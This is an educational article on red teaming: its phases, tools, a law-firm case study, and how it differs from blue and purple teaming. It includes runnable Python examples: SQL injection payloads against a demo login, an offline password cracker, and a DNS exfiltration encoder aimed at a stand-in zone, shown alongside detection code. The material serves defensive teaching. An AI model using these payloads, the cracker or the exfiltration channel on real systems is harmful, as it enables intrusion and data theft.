A 2020 survey by Exabeam at Black Hat USA revealed that 92% of the surveyed organizations engage in Red Teaming exercises. This is an increase from 72% in 2019, indicating the growing adoption of Red Teaming by organizations seeking tighter security.
In the same survey, Exabeam reveals that only 11% of organizations’ blue teams catch red teams, and 80% of organizations have increased their investments in red and blue team adoption.
So, what is red teaming and what does your organization stand to gain from it? This article dives deep into red teaming. Let’s get right into it.
What is Red Teaming?
Red teaming is an ethical hacking exercise. A real cyber attack is simulated to determine the strength of an organization’s cybersecurity framework.
The exercise is undertaken by a red team - a team of authorized hackers that engage in different forms of controlled attacks to identify specific gaps and weaknesses within an organization’s cybersecurity infrastructure.
To get the most from red teaming, the defenders are not told when the exercise will take place. The engagement is authorized and scoped by a small group of stakeholders (often called the white cell or control group), but the blue team and the wider organization are kept in the dark, and the red team runs its simulated attacks at unannounced times.
These simulated attacks are either threats the organization commonly faces or more sophisticated variants it has no experience defending against. Because the timing is unannounced, the exercise shows how ready the organization really is, rather than how ready it is when it knows a test is coming.
Please note that red teaming isn’t limited to virtual/software-based environments. There is also physical red teaming, which involves emulating exploitation of an organization’s physical assets. Such assets would include items such as:
- Physical servers
- Physical file storage
- Production equipment
- Doors, among others.
Phases of red team application
There are multiple stages in a red teaming exercise, and each matters for assessing the security posture. These are the key phases:
- Reconnaissance
- Planning
- Exploitation
- Privilege Escalation
- Reporting
1. Reconnaissance
Once the specific goals of the exercise are set (to extract a particular type of data, for instance), the reconnaissance phase begins.
The reconnaissance phase is all about information gathering. It involves collecting information on IT infrastructure components that are relevant to the attack objective.
This can be information about a server, the people managing the server, its dependencies, active security/access control measures, and server traffic, for instance.
Reconnaissance also covers the target's security operations: which detection products are in use (job postings and vendor case studies often give this away) and, where the sponsor shares it, the Mean Time To Detect (MTTD) and Mean Time To Respond (MTTR). This tells the red team how fast, or how quietly, it needs to operate.
2. Planning
Once reconnaissance is done, planning for the attack begins, using the information gathered in the previous phase. The rules of engagement themselves are agreed with the sponsoring stakeholders before any activity starts; planning fixes the scope, method, and tools of the attack within those rules.
The planning phase identifies the following, among others:
- Communication Plans: How the team will communicate during the operation.
- Entry Points: Specific attack vectors that have been identified as vulnerable.
- Target Restrictions: Limitations on what can be targeted during the attack.
- Threat IPs: The source IP addresses the red team will operate from, recorded so that the sponsor can tell exercise traffic from a real intrusion (deconfliction) if the blue team raises an alarm.
- Repositories for Collated Data: Where the gathered data will be stored for analysis.
- Alternative Mediums for the Attack: Other methods or channels for carrying out the attack.
- Attack Surface: A consolidated view of the target's exposed systems and their weaknesses, from which the most promising points of entry are chosen.
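To make the reconnaissance and planning steps above concrete, here is an added example (not from the original article) that turns reconnaissance output into the attack-surface inventory and candidate entry-point list the plan needs. It assumes the scan was done with Nmap and saved as XML (`nmap -sV -oX scan.xml <targets>`); the `SAMPLE_XML`, the host names and addresses, and the `HIGH_INTEREST` service list are all constructed for the example.

```python
"""Build an attack-surface inventory from Nmap XML output.

Added example (not from the article): a small parser for the XML that
`nmap -sV -oX scan.xml <targets>` writes. SAMPLE_XML is a constructed,
trimmed-down document in that schema, not a real scan.
"""
import xml.etree.ElementTree as ET

# Constructed sample: two hosts, one with a port the firewall filters.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.0/30">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="web01.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="443"><state state="open"/>
        <service name="https" product="nginx" version="1.18.0"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Services the planning phase usually flags as candidate entry points.
# Constructed for the example; tune it to the engagement's objectives.
HIGH_INTEREST = {"ssh", "microsoft-ds", "rdp", "ms-wbt-server", "http", "https"}


def parse_nmap_xml(xml_text):
    """Return {ip: {"hostname": str | None, "ports": [(port, proto, state, service, version)]}}."""
    root = ET.fromstring(xml_text)
    inventory = {}
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        hn = host.find("hostnames/hostname")
        ports = []
        for port in host.findall("ports/port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            name = svc.get("name") if svc is not None else ""
            version = ""
            if svc is not None:
                version = " ".join(filter(None, [svc.get("product"), svc.get("version")]))
            ports.append((int(port.get("portid")), port.get("protocol"), state, name, version))
        inventory[addr.get("addr")] = {
            "hostname": hn.get("name") if hn is not None else None,
            "ports": ports,
        }
    return inventory


def entry_points(inventory):
    """Open, high-interest services: the candidate entry points for the plan."""
    return sorted(
        (ip, port, name, version)
        for ip, data in inventory.items()
        for port, _proto, state, name, version in data["ports"]
        if state == "open" and name in HIGH_INTEREST
    )


def filtered_ports(inventory):
    """Ports where a filter dropped the probe: evidence of access controls in place."""
    return sorted(
        (ip, port)
        for ip, data in inventory.items()
        for port, _proto, state, _name, _version in data["ports"]
        if state == "filtered"
    )


if __name__ == "__main__":
    inv = parse_nmap_xml(SAMPLE_XML)
    for ip, port, name, version in entry_points(inv):
        print(f"{ip}:{port} {name} {version}".rstrip())
    print("filtered:", filtered_ports(inv))
```

The same parser runs unchanged over the output of a real scan; the service versions it pulls out are what the planning phase matches against known weaknesses, and the filtered ports are early evidence of the access controls reconnaissance is meant to map.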
3. Exploitation
Exploitation is the main phase of the red teaming exercise. The in-scope infrastructure is attacked to find and exploit weaknesses in it.
It also involves targeting relevant human actors (identified during reconnaissance) with social engineering techniques like phishing to indirectly gain access to the IT infrastructure. For instance, this may involve sending phishing links to the work emails of humans managing the targeted server(s).
4. Privilege Escalation
Privilege escalation is the stage of exploitation in which the red team works towards its objectives. The access gained in the exploitation phase is usually limited (a single workstation or a low-privileged account), so the ethical attackers go on to exploit further weaknesses from that foothold.
While avoiding detection by the security architecture, the red team probes further, mapping paths to the targets and moving laterally between systems. It then uses each new level of access to progressively gain authority over the targets.
Depending on the objectives of the red teaming exercise, the hackers may then exfiltrate data to an external repository.
5. Reporting
Between the start of reconnaissance and the end of escalation, the red team continuously collects data.
This data is assessed to gain insights into the strengths and weaknesses of the IT infrastructure. Findings are then reported to the security team and relevant stakeholders.
Insights in the red teaming report will also include recommendations, where necessary, on how the organization may improve its cybersecurity against the specific attack initiated.
Red teaming approaches
As mentioned earlier, during the planning stage, the red team identifies the method of attack to use. This method or methodology of attack relates to the relevant techniques through which the red team breaches the IT infrastructure and through which the end goal is achieved.
The most effective approaches of red teaming exercises include:
1. Social Engineering Testing
Social engineering attacks the human component of the IT infrastructure: the organization's people, not only its IT staff. It uses psychological manipulation to get someone to hand over access or reveal sensitive data.
One of the most popular social engineering attacks is phishing: fraudulent emails, text messages, or links that lead to malware or to a fake login page that harvests credentials.
Smishing is phishing through SMS, and vishing is phishing through voice/telephone calls.
Other social engineering methods include pretexting and tailgating. In pretexting, the attacker invents a plausible scenario or identity (an IT helpdesk technician, a new supplier) to get an employee to act or to disclose information. In tailgating, the attacker follows an authorized employee through a controlled door to gain physical access to the IT infrastructure.
2. Brute Force Testing
Brute force attacks use automation to guess passwords, either online against a login interface or offline against captured password hashes.
In red teaming, the ethical hackers use tools like Gobuster (which brute-forces hidden directory, file, and subdomain names rather than passwords) and BruteX (which drives credential guessing against exposed services) until they find a way into the IT infrastructure. Account lockout and rate limiting are what usually stop the online variety; the offline variety is limited only by the attacker's hardware and by how the hashes were produced.
3. Network Penetration Testing
Here, the red team focuses on breaching the network infrastructure. They do this through a number of means, including:
- Finding and exploiting misconfigurations
- Utilizing IP spoofing techniques
- Flooding the network with traffic, such as excessive ICMP requests, to test its resilience
- Compromising network devices (routers, switches, access points) and using them as rogue devices inside the network.
4. Application Layer Testing
Application layer testing targets the application itself rather than the network beneath it. One class of attack is the application-layer distributed denial-of-service (DDoS) attack, which floods a specific function or feature of an application with requests so that it becomes unresponsive to real users. Because it can affect production, DDoS testing is often excluded from the rules of engagement or run only against a staging environment.
Other application layer attacks include:
- SQL injection attacks that target the backend database through unsanitized input
- Cross-site scripting (XSS) attacks that inject attacker-controlled script into pages the application serves to other users
- Parameter tampering attacks that alter the values exchanged between the client and the server (prices, identifiers, roles) so that the server acts on data it never validated.
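As an added example (not from the article), here is the SQL injection case from the list above in runnable form: a login check that concatenates user input into the query, next to the same check with bound parameters. The SQLite database, the `users` table, and the two accounts are constructed for the demonstration.

```python
"""SQL injection: the vulnerable query next to the parameterised fix.

Added example, not from the article: an in-memory SQLite user table with
constructed accounts, a login check built by string formatting (the
classic injectable pattern) and the same check with bound parameters.
"""
import sqlite3


def make_db():
    """Constructed sample data. Real systems store password hashes, not plaintext."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, role TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret-pw", "admin"), ("bob", "hunter2", "user")],
    )
    return con


def login_vulnerable(con, username, password):
    """Concatenates user input into SQL, so the attacker controls the query text."""
    sql = (f"SELECT role FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Bound parameters: the driver never lets input change the statement."""
    row = con.execute(
        "SELECT role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = make_db()
    # Two classic payloads against the username field: a tautology that
    # short-circuits the password check, and a comment that removes it.
    for payload in ("alice' OR '1'='1", "alice'--"):
        print(repr(payload))
        print("  vulnerable ->", login_vulnerable(con, payload, "wrong"))
        print("  safe       ->", login_safe(con, payload, "wrong"))
```

With the tautology payload the vulnerable query becomes `... username = 'alice' OR '1'='1' AND password = 'wrong'`; since `AND` binds tighter than `OR`, the row for `alice` matches regardless of the password and the caller is handed the `admin` role. The parameterised version sends the payload as a literal string value, matches no row, and returns `None`.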
5. Shared Content Corruption Testing
Shared content corruption is where malware is planted in an internal storage location and travels with any file shared from there to another location. It is a method of lateral movement rather than of privilege escalation in the strict sense: it lets the attackers spread malware from a breached IT component to other components.
These are just a few of the many different red teaming methodologies that may be individually used or combined by red teams to ethically exploit IT infrastructures.
Red Teaming tools
Specific tools are used to control the cyberattack and to support comprehensive reporting of the red teaming operation.
Of course, which tools the red team uses depends on the objective of the exercise. Some popular red teaming tools include:
Nmap is a free network reconnaissance tool used for host discovery, port scanning, and service and operating-system detection. From the way probes are answered or dropped it can also infer the presence of packet filters, firewalls, and routers, and it scales to networks of hundreds of thousands of devices.
Hashcat is a free, multi-OS password recovery tool used to run controlled offline cracking against captured hashes, using the GPU where one is available. It supports dictionary, rule-based, and mask attacks to generate password candidates from wordlists, and it has an interactive pause and resume feature.
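To show what the brute force testing described earlier and Hashcat's offline cracking actually involve, here is an added example (not from the article and not Hashcat's code) in plain Python: a dictionary attack with a few Hashcat-style candidate rules against unsalted SHA-1 hashes, and the same attack against a salted, iterated PBKDF2 record. The `WORDLIST`, the account names, and the "captured" hashes are constructed.

```python
"""Offline password cracking, the work Hashcat does, scaled down to Python.

Added example, not from the article and not Hashcat's code. It runs a
dictionary attack with a few Hashcat-style candidate rules against
unsalted SHA-1 hashes, then the same attack against a salted, iterated
PBKDF2 record to show why the second costs so much more. WORDLIST, the
account names and the "captured" hashes are constructed.
"""
import hashlib
import hmac
import os
import time

# Constructed wordlist; real engagements use large leaked-password lists.
WORDLIST = ["123456", "password", "letmein", "Summer2023!", "Welcome1", "admin"]


def candidates(word):
    """Hashcat-style rules: the word as-is, capitalised, and with common suffixes."""
    yield word
    yield word.capitalize()
    yield word + "1"
    yield word + "!"


def sha1_hex(text):
    """Unsalted SHA-1 (Hashcat mode 100), standing in for any fast hash."""
    return hashlib.sha1(text.encode()).hexdigest()


def crack_fast_hashes(targets, wordlist):
    """Dictionary attack against {username: sha1_hex_digest}.

    Each candidate is hashed once and looked up against every target, which
    is why unsalted fast hashes fall so quickly: the cost does not grow with
    the number of accounts.
    """
    lookup = {digest.lower(): user for user, digest in targets.items()}
    found = {}
    for word in wordlist:
        for cand in candidates(word):
            user = lookup.get(sha1_hex(cand))
            if user is not None and user not in found:
                found[user] = cand
    return found


def pbkdf2_record(password, salt=None, iterations=600_000):
    """Salted, iterated storage: returns (salt, iterations, derived_key)."""
    salt = salt or os.urandom(16)
    return salt, iterations, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def crack_pbkdf2(record, wordlist):
    """Same attack against one PBKDF2 record. Every candidate must be
    re-derived for this salt, so the cost is candidates x iterations per user."""
    salt, iterations, dk = record
    for word in wordlist:
        for cand in candidates(word):
            guess = hashlib.pbkdf2_hmac("sha256", cand.encode(), salt, iterations)
            if hmac.compare_digest(guess, dk):
                return cand
    return None


if __name__ == "__main__":
    captured = {"svc_backup": sha1_hex("Summer2023!"), "jdoe": sha1_hex("Welcome1")}
    t0 = time.perf_counter()
    print("fast hashes:", crack_fast_hashes(captured, WORDLIST),
          f"in {time.perf_counter() - t0:.4f}s")
    record = pbkdf2_record("Welcome1", iterations=100_000)  # lowered for the demo
    t0 = time.perf_counter()
    print("pbkdf2:", crack_pbkdf2(record, WORDLIST),
          f"in {time.perf_counter() - t0:.2f}s")
```

Running it shows the two sides of the brute force question: the fast-hash attack finishes in microseconds and recovers both accounts from one pass over the wordlist, while the PBKDF2 attack against a single account takes visibly longer and would have to be repeated for every user. That cost difference, not secrecy of the algorithm, is what a defender buys with a salted, slow password hash.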
Web server scanners, run during reconnaissance, flag weaknesses such as:
- Outdated server and application versions
- Contaminated files
- Server misconfigurations
Gophish is a free, open-source phishing framework used to set up, schedule, and monitor phishing campaigns. It comes with customizable email and landing-page templates and reports opens, clicks, and submitted credentials in real time.
BeRoot is a privilege escalation tool used to identify misconfigurations in compromised Windows-based environments.
DNSExfiltrator, as its name suggests, is a data exfiltration tool used in the final stage of an exercise to smuggle data out of the network by encoding it inside DNS requests, a channel that is almost always allowed out of a corporate network.
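The DNS channel that DNSExfiltrator uses is simple enough to show end to end. The following is an added example, not the tool's own code and not from the article: a sender that base32-encodes a payload into DNS query names under an attacker-controlled zone, the reassembly routine an attacker's authoritative DNS server would run, and a detector that scores query names by label length and entropy, which is how a blue team spots this channel in DNS logs. `ZONE`, the sample payload, and the detector thresholds are constructed assumptions.

```python
"""Data exfiltration over DNS, and a heuristic to detect it.

Added example: not DNSExfiltrator's code and not from the article, but the
technique such tools implement. ZONE, the payload and the detector
thresholds are constructed assumptions for the demonstration.
"""
import base64
import math
from collections import Counter

ZONE = "cdn-updates.example"   # constructed attacker-controlled zone
ZONE_LABELS = ZONE.count(".") + 1
MAX_LABEL = 63                 # RFC 1035 label length limit
MAX_NAME = 253                 # practical limit for a full domain name


def encode_queries(data, session="a1", zone=ZONE, chunk=60):
    """Split data into query names of the form <seq>-<session>.<chunk>.<zone>.

    Base32 is used because DNS names are case-insensitive: base64 would be
    corrupted by resolvers that lower-case labels.
    """
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    queries = []
    for seq, i in enumerate(range(0, len(b32), chunk)):
        name = f"{seq}-{session}.{b32[i:i + chunk]}.{zone}"
        assert all(len(label) <= MAX_LABEL for label in name.split("."))
        assert len(name) <= MAX_NAME
        queries.append(name)
    return queries


def decode_queries(queries, zone=ZONE):
    """Reassemble the payload from query names, in any arrival order."""
    chunks = {}
    for name in queries:
        body = name[: -(len(zone) + 1)]        # strip ".<zone>"
        head, chunk = body.split(".", 1)
        seq = int(head.split("-", 1)[0])
        chunks[seq] = chunk
    b32 = "".join(chunks[i] for i in sorted(chunks)).upper()
    b32 += "=" * (-len(b32) % 8)               # restore base32 padding
    return base64.b32decode(b32)


def shannon_entropy(s):
    """Bits of entropy per character of s."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())


def is_suspicious(name, zone_labels=ZONE_LABELS, max_label=30, min_entropy=3.0):
    """Flag a query whose subdomain has an unusually long, high-entropy label.

    Encoded payloads produce labels far longer than human-chosen host names
    and with a flatter character distribution. zone_labels assumes a two-label
    registered domain; production code should use the public suffix list.
    """
    labels = name.lower().rstrip(".").split(".")[:-zone_labels]
    if not labels:
        return False
    sub = "".join(labels)
    return max(len(label) for label in labels) > max_label and shannon_entropy(sub) > min_entropy


if __name__ == "__main__":
    # Constructed payload standing in for a stolen document summary.
    secret = b"ACME v. Globex: settlement offer USD 2.4M, full client list attached (xlsx)"
    qs = encode_queries(secret)
    for q in qs:
        print(q, "<- suspicious" if is_suspicious(q) else "")
    assert decode_queries(reversed(qs)) == secret
    print("benign:", is_suspicious("www.example.test"))
```

The detector is deliberately coarse. CDN cache-busting names and DNS-based anti-virus lookups also use long, high-entropy labels, so in practice the thresholds are tuned against a baseline of the organization's own DNS logs, and a zone that suddenly receives hundreds of unique subdomains from one host is a stronger signal than any single query.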
As we can see, each of these tools has a specific use and operates in a different phase of the red teaming exercise.
There are many more diverse red teaming tools not mentioned here, and as we mentioned, you will choose relevant tools based on the objective and plan of the exercise.
How red teaming is helping organizations: a Synopsys case study
How are organizations putting red teams to use? Here is a quick glance at a case study from Synopsys.
With law firms dealing with sensitive client data, Synopsys’ law firm customer was seeking an approach that would give it more visibility than its currently applied security assessments.
Synopsys, a service provider experienced in executing red teaming composite attacks to compromise sensitive data, took up this challenge. It executed the exercise in five phases:
- Adversarial Objectives and Strategy, the phase where the objectives for the attack were determined. The objectives were to gain access to sensitive client data, including petitions and mergers & acquisitions documents, and to gain administrative access to internal networks and employee email systems in order to send unauthorized emails.
- "Getting Started", the reconnaissance stage where information on network components and employees was gathered. Synopsys gathered information on web applications, live servers, authentication frameworks, and dependencies. It also looked at employee emails, phone numbers, job descriptions, and social media backgrounds, just as a real attacker would have seen them.
- Attack Path Modeling, the planning stage where the attack motivations and their relevant technical risks, non-technical risks, and composite attack descriptions were comprehensively determined.
- "Execution", the phase where Synopsys carried out its exploitation and privilege escalation attacks on the law firm’s infrastructure. The attacks included an Employee Email Services Attack that spied on the exchange of sensitive client communication; this was achieved by gaining access to authorized email accounts through phishing campaigns and impersonating those accounts when dealing with clients. For privilege escalation, Synopsys launched a Multi-Factor Authentication (MFA) Attack: reconnaissance identified services that were missing MFA, the team logged into those services with the credentials it had obtained, and from that foothold it compromised services that did enforce MFA.
- Reporting, the phase where Synopsys’ red team identified two major weaknesses in the law firm’s infrastructure: the lack of employee awareness of social engineering attacks, and the fact that services linked to sensitive client information lacked multi-factor authentication.
Synopsys made the following recommendations:
- Adopt MFA on all external-facing services
- Engage in continuous employee awareness programs against social engineering risks
- Exercise continuous auditing of off-the-shelf software version releases before use.
You can find the full case study here.
Red Teaming, Blue Teaming, and Purple Teaming: What's the difference?
Now, at this point you have come across a couple of mentions of "blue teaming". There is one more that is known as purple teaming. How do these three differ?
Blue Teaming is simply the protection of the IT infrastructure against cyber attackers.
Rather than trying to exploit the IT infrastructure with techniques like brute force tools, a defensive toolkit is used to protect and improve the IT infrastructure.
This defensive toolkit typically includes a combination of firewalls, Security Information and Event Management (SIEM) tools, Intrusion Detection Systems (IDS), Vulnerability Management Systems (VMS), Network Security Monitoring (NSM) tools, and Security Orchestration, Automation, and Response (SOAR) tools, among others. During a red teaming exercise, the blue team's job is to detect and contain the red team exactly as it would a real adversary.
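A detection rule of the kind a blue team runs in its SIEM, as an added example written in plain Python (not from the article and not tied to any particular SIEM product): it parses sshd-style "Failed password" log lines, counts failures per source address in a sliding window, flags a source that crosses the threshold, and then checks whether a flagged source later logged in successfully, which is the event a responder cares about most. The `LOG_LINES`, host names, and addresses are constructed; the year is assumed because syslog timestamps carry none.

```python
"""Detecting a password-guessing attack in authentication logs.

Added example, not from the article: a SIEM-style rule written out in plain
Python. It parses sshd "Failed password" lines, counts failures per source
IP in a sliding window, and raises one alert per source that crosses the
threshold. LOG_LINES are constructed; the format mirrors OpenSSH syslog
output but the hosts and addresses are invented.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd excerpt: 198.51.100.7 sprays guesses at several accounts
# within a few seconds and finally gets in; 203.0.113.5 is one user
# mistyping twice before succeeding.
LOG_LINES = """\
Mar 14 02:11:01 bastion sshd[4121]: Failed password for root from 198.51.100.7 port 51022 ssh2
Mar 14 02:11:02 bastion sshd[4121]: Failed password for invalid user admin from 198.51.100.7 port 51023 ssh2
Mar 14 02:11:02 bastion sshd[4121]: Failed password for invalid user oracle from 198.51.100.7 port 51024 ssh2
Mar 14 02:11:03 bastion sshd[4121]: Failed password for invalid user test from 198.51.100.7 port 51025 ssh2
Mar 14 02:11:04 bastion sshd[4121]: Failed password for jdoe from 198.51.100.7 port 51026 ssh2
Mar 14 02:11:09 bastion sshd[4130]: Failed password for jdoe from 203.0.113.5 port 40110 ssh2
Mar 14 02:11:15 bastion sshd[4130]: Failed password for jdoe from 203.0.113.5 port 40110 ssh2
Mar 14 02:11:20 bastion sshd[4130]: Accepted password for jdoe from 203.0.113.5 port 40110 ssh2
Mar 14 02:11:21 bastion sshd[4121]: Accepted password for jdoe from 198.51.100.7 port 51027 ssh2
""".splitlines()

_PREFIX = r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
FAILED = re.compile(_PREFIX + r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port")
ACCEPTED = re.compile(_PREFIX + r"Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+) port")


def parse_ts(ts, year=2024):
    """Syslog timestamps carry no year; one is assumed (constructed data)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Return {ip: {"users": set, "first": ts, "last": ts}} for every source
    with at least `threshold` failures inside any `window_s`-second window."""
    recent = defaultdict(deque)   # ip -> deque of (timestamp, user)
    alerts = {}
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue
        ts = parse_ts(m["ts"])
        q = recent[m["ip"]]
        q.append((ts, m["user"]))
        while (ts - q[0][0]).total_seconds() > window_s:   # slide the window
            q.popleft()
        if len(q) >= threshold and m["ip"] not in alerts:
            alerts[m["ip"]] = {"users": {u for _, u in q}, "first": q[0][0], "last": ts}
    return alerts


def successes_after_bruteforce(lines, alerts):
    """Successful logins from a flagged source after its alert: likely compromise."""
    hits = []
    for line in lines:
        m = ACCEPTED.match(line)
        if m and m["ip"] in alerts and parse_ts(m["ts"]) >= alerts[m["ip"]]["last"]:
            hits.append((m["ip"], m["user"]))
    return hits


if __name__ == "__main__":
    alerts = detect_bruteforce(LOG_LINES)
    for ip, info in alerts.items():
        print(f"ALERT {ip}: {len(info['users'])} accounts tried between "
              f"{info['first']:%H:%M:%S} and {info['last']:%H:%M:%S}")
    print("successful logins from flagged sources:",
          successes_after_bruteforce(LOG_LINES, alerts))
```

The rule fires on the spraying source and stays quiet for the user who mistyped twice; the second function is what turns the alert into an incident, because a success following a burst of failures from the same source is the signature of a guessed or stolen credential. In a real SIEM the same logic runs as a correlation search over the authentication index, with the threshold and window tuned to the organization's normal failure rate.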
Purple Teaming, on the other hand, is a collaborative approach where the red and blue teams are brought together. Rather than these two working in a siloed environment that hinders communication and collaboration, they work like a single unit that shares security information.
Are Red Teaming and Penetration Testing the same?
A penetration test (Pen Test) is an offensive approach where cyberattack tools are used to exploit the IT infrastructure. With this definition, it is easy to mistake a pen test for a red teaming exercise. However, they may be distinguished on some technicalities.
Red teaming is objective-oriented. It involves targeting specific datasets and systems. On the other hand, a penetration test seeks to identify as many vulnerabilities (in as many forms) as possible within the IT infrastructure.
Red teaming may require custom tools, involves further probe (privilege escalation), and is typically long-term. Pen Tests, on the other hand, use readily available tools, stop at exploitation, and are short-term.
What’s more, while the blue team typically knows that a pen test will be taking place, it is kept in the dark during a red teaming exercise. One last difference is that a penetration test reports the vulnerabilities in the systems it is scoped to examine, whereas a red teaming exercise also tests whether the organization's people and processes detect and respond when those vulnerabilities are chained together by a determined attacker.
Red Teaming limitations
The major challenge with red teaming is that it has a limited scope. As explained, red teaming focuses on utilizing the best methods and techniques to achieve a specific goal.
This means that the offensive assessment is limited to the objective and isn’t comprehensive enough to identify all vulnerabilities within the IT infrastructure. For instance, if the goal is to exfiltrate data, there may be no consideration for vulnerabilities affecting an application’s performance against DDoS attacks.
Hence, we advise organizations in the early stages of their cybersecurity program to focus on penetration testing. Adopt red teaming once pen tests and other security measures are understood and have reliably matured.
For long term success, consider Red Teaming-as-a-Service. This means you outsource the entire intensive, long-term assessment process to a managed security service provider that offers red teaming. This is just like we see with Synopsys and their law firm customer.
Another approach to the time the exercise takes is a continuous, automated model: attack simulations run on an ongoing basis rather than as a one-off engagement, with tooling (increasingly AI-assisted) handling the repetitive work while human operators set the objectives and interpret the results.